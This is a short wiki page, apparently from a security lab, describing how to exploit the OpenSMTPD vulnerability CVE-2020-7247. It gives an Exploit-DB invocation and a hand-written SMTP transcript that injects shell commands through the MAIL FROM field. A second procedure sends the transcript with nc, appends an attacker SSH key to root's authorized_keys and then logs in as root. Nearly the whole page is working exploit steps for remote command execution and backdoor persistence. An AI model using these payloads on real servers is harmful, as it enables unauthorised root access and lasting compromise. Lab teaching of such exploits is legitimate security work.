security:exploit:opensmtpd_cve-2020-7247
Inhaltsverzeichnis
Create a file on vulnerable Server
1) with existing Exploit https://www.exploit-db.com/exploits/47984
python3 exploit.py 192.168.6.2 25 'touch /root/pwn'
2) manually
HELO professor.falken MAIL FROM:<;touch /root/pwn;> RCPT TO:<root@server.lab> DATA Subject: mfckr dmf .
Install Backdoor
create ssh key
ssh-keygen
create exploit transcript (use pub ssh key)
vi exploit.txt
HELO professor.falken MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;> RCPT TO:<root@server.lab> DATA #0 #1 #2 #3 #4 #5 #6 #7 #8 #9 #a #b #c #d echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzaT5Fjb1YgVxHI1+2IZKK5QrnDV6EoMrJ6bLCJcpQzTmrlmWwh9u6ReIptPlWhp/Lq0cs+I07iYhB/1mcuV0aG89gyXt8Vh7K3x7E003SKXumQva++VvWcCe+0DaDEVlELpqkGOMOu9X7g2E9mE96/Qy0l4rOyQJove8K7l+WJ/HZnpmkyoRemPSk+YJlN55Fl9h+37AbvgJDlwJbkncYY3ir41v4whIRTgRXwxGMULdBpZn5I00GlN1F6Me+ez20WJrgFDEQlYUfF9hX4nLYLOvmBXF8G77CUTlVn0HLKgTlH9qy93Ylt29eZHhMx+Ghqd38+p3k/IozZkMQ+wbN student@desktop " >> /root/.ssh/authorized_keys .
Perform Exploit
nc -q1 -i1 -v server smtp < exploit.txt
ssh into server
ssh -i .ssh/id_rsa root@server
security/exploit/opensmtpd_cve-2020-7247.txt · Zuletzt geändert: von wikiadm